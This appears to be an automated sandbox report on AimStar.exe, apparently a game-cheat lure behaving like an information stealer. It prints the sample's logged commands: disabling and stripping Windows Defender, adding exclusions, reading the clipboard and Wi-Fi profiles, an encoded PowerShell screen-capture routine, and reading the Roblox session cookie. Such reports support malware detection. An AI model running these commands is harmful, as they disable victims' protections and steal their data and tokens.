Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5516:120:WilError_03

Source: C:\Users\user\Desktop\AimStar.exe

File created: C:\Users\user\AppData\Local\Temp\_MEI72842

Jump to behavior

Source: AimStar.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe

File read: C:\Users\desktop.ini

Source: C:\Users\user\Desktop\AimStar.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\SIHClient.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\SIHClient.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\SIHClient.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\SIHClient.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: AimStar.exe, 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: AimStar.exe, AimStar.exe, 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: AimStar.exe, AimStar.exe, 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: AimStar.exe, AimStar.exe, 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: AimStar.exe, AimStar.exe, 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: AimStar.exe, AimStar.exe, 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: AimStar.exe, 00000002.00000003.2211316697.000002020D9EF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: AimStar.exe, AimStar.exe, 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);

Source: AimStar.exe	Virustotal: Detection: 36%
Source: AimStar.exe	ReversingLabs: Detection: 34%

Source: AimStar.exe	String found in binary or memory: set-addPolicy
Source: AimStar.exe	String found in binary or memory: id-cmc-addExtensions
Source: AimStar.exe	String found in binary or memory: can't send non-None value to a just-started coroutine
Source: AimStar.exe	String found in binary or memory: --help
Source: AimStar.exe	String found in binary or memory: --help
Source: AimStar.exe	String found in binary or memory: fma($module, x, y, z, /) -- Fused multiply-add operation. Compute (x * y) + z with a single round.
Source: AimStar.exe	String found in binary or memory: can't send non-None value to a just-started async generator
Source: AimStar.exe	String found in binary or memory: can't send non-None value to a just-started generator
Source: AimStar.exe	String found in binary or memory: various kinds of output. Setting it to 0 deactivates this behavior. PYTHON_HISTORY : the location of a .python_history file. These variables have equivalent command-line options (see --help for details): PYTHON_CPU_COUNT: override the retu
Source: AimStar.exe	String found in binary or memory: various kinds of output. Setting it to 0 deactivates this behavior. PYTHON_HISTORY : the location of a .python_history file. These variables have equivalent command-line options (see --help for details): PYTHON_CPU_COUNT: override the retu

Source: C:\Users\user\Desktop\AimStar.exe

File read: C:\Users\user\Desktop\AimStar.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\AimStar.exe "C:\Users\user\Desktop\AimStar.exe"
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Users\user\Desktop\AimStar.exe "C:\Users\user\Desktop\AimStar.exe"
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\AimStar.exe'"
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\AimStar.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\SIHClient.exe C:\Windows\System32\sihclient.exe /cv QZj+5JUF0k+XXwZK8rpr7Q.0.2
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hrvhwpsf\hrvhwpsf.cmdline"
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1C05.tmp" "c:\Users\user\AppData\Local\Temp\hrvhwpsf\CSC4E15ECD8FE3B4FA09888C7495932E1F6.TMP"
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
